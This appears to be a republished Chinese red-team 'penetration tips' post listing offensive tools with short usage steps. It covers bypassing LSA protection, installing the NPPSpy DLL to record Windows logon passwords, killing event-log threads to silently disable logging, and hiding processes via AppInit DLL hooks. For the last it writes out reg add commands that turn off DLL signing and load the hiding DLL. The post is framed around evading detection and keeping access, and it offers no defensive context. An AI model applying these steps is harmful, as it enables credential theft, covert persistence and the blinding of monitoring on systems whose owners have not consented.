渗透Tips - 第十九期

渗透Tips - 第十九期
2020-07-17 13:53:49 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏

1、Violation_Pnetest

https://github.com/EvilAnne/Violation_Pnetest

作者：广东靓仔

2、RedTips

https://vincentyiu.com/red-team-tips

一些规避操作，避免渗透过程中被发现、掉权以及技巧等红队相关的tips

3、绕过lsa protection

https://github.com/RedCursorSecurityConsulting/PPLKiller

4、NPPSpy记录密码

https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/NPPSPy.c

默认保存位置是C盘根目录，可以修改重新编译

将DLL放入system32文件夹内

执行ps1脚本自动添加注册表

无需重启

Tips 5. 破坏Windows日志记录功能

通过调用TerminateThread结束实现日志功能的线程，使得日志记录功能失效，但Windows Event Log服务没有被破坏，状态仍为正在运行

Powershell:

https://github.com/hlldz/Invoke-Phant0m

C++:

https://github.com/3gstudent/Windwos-EventLog-Bypass

Tips 6. Win7和Windows Server 2008 R2下的进程隐藏

利用globalAPIhooks，通过修改注册表实现

下载工程：

https://github.com/subTee/AppInitGlobalHooks-Mimikatz

修改代码指定要隐藏的程序名cldr.exe，编译成cldr.dll，cldr.dll放在

C:\ProgramData\Microsoft\HelpLibrary\

管理员权限：

reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /freg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f

此时，任务管理器进程列表不存在cldr.exe，Process Explorer不存在cldr.exe，Tasklist.exe不存在cldr.exe

对于64位系统：

管理员权限：

reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /freg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /freg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /freg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f

文章来源: http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651866656&idx=1&sn=b5471fca53b8c413262ea4e48ad20183&chksm=8442bec7b33537d18472d3fb8ebfb0fad75fe96ad06d5368a1313f98fe7632f958470d324c59&mpshare=1&scene=24&srcid=0717D99kLR0HEMTG9CRsZiPE&sharer_sharetime=1594965228694&sharer_shareid=5191b3dcb328f693d5261ba6bca8d267#rd
如有侵权请联系:admin#unsafe.sh